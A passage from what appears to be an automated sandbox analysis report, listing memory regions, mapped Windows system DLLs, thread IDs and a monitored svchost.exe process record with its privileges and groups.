"c:\\windows\\system32\\wudfplatform.dll") Region: id = 4036 start_va = 0x7ff8523e0000 end_va = 0x7ff8523fdfff monitored = 0 entry_point = 0x7ff8523e3ce0 region_type = mapped_file name = "wudfsvc.dll" filename = "\\Windows\\System32\\WUDFSvc.dll" (normalized: "c:\\windows\\system32\\wudfsvc.dll") Region: id = 4037 start_va = 0x7ff8524b0000 end_va = 0x7ff8524bdfff monitored = 0 entry_point = 0x7ff8524b1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4038 start_va = 0x7ff852960000 end_va = 0x7ff852997fff monitored = 0 entry_point = 0x7ff852978cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4039 start_va = 0x7ff852f00000 end_va = 0x7ff852f6ffff monitored = 0 entry_point = 0x7ff852f22960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 4040 start_va = 0x7ff852f70000 end_va = 0x7ff852fb9fff monitored = 0 entry_point = 0x7ff852f81450 region_type = mapped_file name = "audioendpointbuilder.dll" filename = "\\Windows\\System32\\AudioEndpointBuilder.dll" (normalized: "c:\\windows\\system32\\audioendpointbuilder.dll") Region: id = 4041 start_va = 0x7ff853190000 end_va = 0x7ff8531a6fff monitored = 0 entry_point = 0x7ff8531925d0 region_type = mapped_file name = "portabledeviceconnectapi.dll" filename = "\\Windows\\System32\\PortableDeviceConnectApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceconnectapi.dll") Region: id = 4042 start_va = 0x7ff8531b0000 end_va = 0x7ff853250fff monitored = 0 entry_point = 0x7ff8531b3db0 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 4043 start_va = 0x7ff853290000 end_va = 0x7ff8532a9fff monitored = 0 entry_point = 0x7ff853294620 region_type = mapped_file name = "wpdbusenum.dll" filename = "\\Windows\\System32\\wpdbusenum.dll" (normalized: "c:\\windows\\system32\\wpdbusenum.dll") Region: id = 4044 start_va = 0x7ff8532b0000 end_va = 0x7ff8532bbfff monitored = 0 entry_point = 0x7ff8532b2830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 4045 start_va = 0x7ff855ee0000 end_va = 0x7ff855f9efff monitored = 0 entry_point = 0x7ff855f01c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 4046 start_va = 0x7ff855ff0000 end_va = 0x7ff856025fff monitored = 0 entry_point = 0x7ff856000070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 4047 start_va = 0x7ff856dc0000 end_va = 0x7ff857252fff monitored = 0 entry_point = 0x7ff856dcf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 4048 start_va = 0x7ff8576d0000 end_va = 0x7ff85778dfff monitored = 0 entry_point = 0x7ff857712d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 4049 start_va = 0x7ff857b90000 end_va = 0x7ff857c08fff monitored = 0 entry_point = 0x7ff857bafb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 4050 start_va = 0x7ff857c10000 end_va = 0x7ff857d95fff monitored = 0 entry_point = 0x7ff857c5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4051 start_va = 0x7ff857e00000 end_va = 0x7ff857e12fff monitored = 0 entry_point = 0x7ff857e02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4052 start_va = 0x7ff857f00000 end_va = 0x7ff857f0afff monitored = 0 entry_point = 0x7ff857f01e70 region_type = mapped_file name = "systemeventsbrokerclient.dll" filename = "\\Windows\\System32\\SystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\systemeventsbrokerclient.dll") Region: id = 4053 start_va = 0x7ff857fa0000 end_va = 0x7ff857fdffff monitored = 0 entry_point = 0x7ff857fb1960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 4054 start_va = 0x7ff858130000 end_va = 0x7ff858156fff monitored = 0 entry_point = 0x7ff858137940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4055 start_va = 0x7ff858890000 end_va = 0x7ff858983fff monitored = 0 entry_point = 0x7ff85889a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 4056 start_va = 0x7ff858be0000 end_va = 0x7ff858c10fff monitored = 0 entry_point = 0x7ff858be7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4057 start_va = 0x7ff858e50000 end_va = 0x7ff858e6efff monitored = 0 entry_point = 0x7ff858e55d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4058 start_va = 0x7ff858fc0000 end_va = 0x7ff85901bfff monitored = 0 entry_point = 0x7ff858fd6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4059 start_va = 0x7ff859020000 end_va = 0x7ff859075fff monitored = 0 entry_point = 0x7ff859030bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4060 start_va = 0x7ff8593d0000 end_va = 0x7ff8593fcfff monitored = 0 entry_point = 0x7ff8593e9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4061 start_va = 0x7ff859580000 end_va = 0x7ff8595a8fff monitored = 0 entry_point = 0x7ff859594530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4062 start_va = 0x7ff8596f0000 end_va = 0x7ff8596fffff monitored = 0 entry_point = 0x7ff8596f56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4063 start_va = 0x7ff859700000 end_va = 0x7ff859713fff monitored = 0 entry_point = 0x7ff8597052e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4064 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4065 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4066 start_va = 0x7ff859850000 end_va = 0x7ff859a16fff monitored = 0 entry_point = 0x7ff8598adb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4067 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4068 start_va = 0x7ff859c10000 end_va = 0x7ff859c64fff monitored = 0 entry_point = 0x7ff859c27970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 4069 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4070 start_va = 0x7ff85a3c0000 end_va = 0x7ff85a402fff monitored = 0 entry_point = 0x7ff85a3d4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4071 start_va = 0x7ff85a410000 end_va = 0x7ff85a4c4fff monitored = 0 entry_point = 0x7ff85a4522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4072 start_va = 0x7ff85a4d0000 end_va = 0x7ff85a521fff monitored = 0 entry_point = 0x7ff85a4df530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4073 start_va = 0x7ff85a530000 end_va = 0x7ff85a537fff monitored = 0 entry_point = 0x7ff85a531ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4074 start_va = 0x7ff85bcb0000 end_va = 0x7ff85be05fff monitored = 0 entry_point = 0x7ff85bcba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4075 start_va = 0x7ff85be10000 end_va = 0x7ff85be7efff monitored = 0 entry_point = 0x7ff85be35f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 4076 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4077 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4078 start_va = 0x7ff85c080000 end_va = 0x7ff85c126fff monitored = 0 entry_point = 0x7ff85c08b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4079 start_va = 0x7ff85c130000 end_va = 0x7ff85c1f0fff monitored = 0 entry_point = 0x7ff85c150da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4080 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4081 start_va = 0x7ff85c410000 end_va = 0x7ff85c552fff monitored = 0 entry_point = 0x7ff85c438210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4082 start_va = 0x7ff85c560000 end_va = 0x7ff85c6e5fff monitored = 0 entry_point = 0x7ff85c5affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4083 start_va = 0x7ff85c6f0000 end_va = 0x7ff85cb18fff monitored = 0 entry_point = 0x7ff85c718740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 4084 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4085 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4086 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4087 start_va = 0x7ff85cf10000 end_va = 0x7ff85cf7afff monitored = 0 entry_point = 0x7ff85cf290c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4088 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5008 start_va = 0x1120000 end_va = 0x1121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 5009 start_va = 0x1c40000 end_va = 0x1ce0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Thread: id = 418 os_tid = 0xd8c Thread: id = 419 os_tid = 0xde8 Thread: id = 420 os_tid = 0xe68 Thread: id = 421 os_tid = 0xe20 Thread: id = 422 os_tid = 0xe1c Thread: id = 423 os_tid = 0xcc4 Thread: id = 424 os_tid = 0xc98 Thread: id = 425 os_tid = 0x9e8 Thread: id = 426 os_tid = 0x260 Thread: id = 427 os_tid = 0x674 Thread: id = 428 os_tid = 0x670 Thread: id = 429 os_tid = 0x618 Thread: id = 430 os_tid = 0x534 Thread: id = 431 os_tid = 0x530 Thread: id = 432 os_tid = 0x524 Thread: id = 433 os_tid = 0x438 Thread: id = 434 os_tid = 0x430 Thread: id = 435 os_tid = 0x414 Thread: id = 436 os_tid = 0x40c Thread: id = 437 os_tid = 0x408 Thread: id = 438 os_tid = 0x210 Process: id = "33" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3d752000" os_pid = "0x45c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:00010216" [0xc000000f], "LOCAL" [0x7] Region: id = 4539 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4540 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4541 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4542 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4543 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 4544 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 4545 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 4546 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4547 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4548 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 4549 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 4550 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4551 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4552 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4553 start_va = 0x580000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 4554 start_va = 0x640000 end_va = 0x640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 4555 start_va = 0x650000 end_va = 0x650fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 4556 start_va = 0x660000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 4557 start_va = 0x670000 end_va = 0x670fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 4558 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 4559 start_va = 0x690000 end_va = 0x696fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 4560 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 4561 start_va = 0x6b0000 end_va = 0x6b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 4562 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 4563 start_va = 0x6d0000 end_va = 0x6d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 4564 start_va = 0x6e0000 end_va = 0x6e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 4565 start_va = 0x6f0000 end_va = 0x6f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 4566 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 4567 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 4568 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 4569 start_va = 0xb20000 end_va = 0xf1afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 4570 start_va = 0xf20000 end_va = 0x101ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 4571 start_va = 0x1020000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 4572 start_va = 0x10a0000 end_va = 0x10a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 4573 start_va = 0x10b0000 end_va = 0x10b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 4574 start_va = 0x10c0000 end_va = 0x10c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 4575 start_va = 0x10d0000 end_va = 0x10d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 4576 start_va = 0x10e0000 end_va = 0x10effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4577 start_va = 0x10f0000 end_va = 0x10f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 4578 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 4579 start_va = 0x1200000 end_va = 0x127ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 4580 start_va = 0x1280000 end_va = 0x128ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001280000" filename = "" Region: id = 4581 start_va = 0x1290000 end_va = 0x129ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001290000" filename = "" Region: id = 4582 start_va = 0x12a0000 end_va = 0x12affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 4583 start_va = 0x12b0000 end_va = 0x12bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012b0000" filename = "" Region: id = 4584 start_va = 0x12c0000 end_va = 0x12cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012c0000" filename = "" Region: id = 4585 start_va = 0x12d0000 end_va = 0x12dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012d0000" filename = "" Region: id = 4586 start_va = 0x12e0000 end_va = 0x12effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4587 start_va = 0x12f0000 end_va = 0x12fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4588 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 4589 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 4590 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 4591 start_va = 0x1600000 end_va = 0x16c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 4592 start_va = 0x16d0000 end_va = 0x17cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016d0000" filename = "" Region: id = 4593 start_va = 0x17d0000 end_va = 0x17dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017d0000" filename = "" Region: id = 4594 start_va = 0x17e0000 end_va = 0x17effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017e0000" filename = "" Region: id = 4595 start_va = 0x17f0000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017f0000" filename = "" Region: id = 4596 start_va = 0x1800000 end_va = 0x180ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 4597 start_va = 0x1810000 end_va = 0x181ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001810000" filename = "" Region: id = 4598 start_va = 0x1820000 end_va = 0x182ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001820000" filename = "" Region: id = 4599 start_va = 0x1830000 end_va = 0x183ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4600 start_va = 0x1840000 end_va = 0x184ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4601 start_va = 0x1850000 end_va = 0x185ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4602 start_va = 0x1860000 end_va = 0x186ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4603 start_va = 0x1870000 end_va = 0x187ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4604 start_va = 0x1880000 end_va = 0x188ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4605 start_va = 0x1890000 end_va = 0x189ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4606 start_va = 0x18a0000 end_va = 0x18a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 4607 start_va = 0x18b0000 end_va = 0x18bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4608 start_va = 0x18c0000 end_va = 0x18cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4609 start_va = 0x18d0000 end_va = 0x19cffff monitored = 1 entry_point = 0x0 region_type = private name = 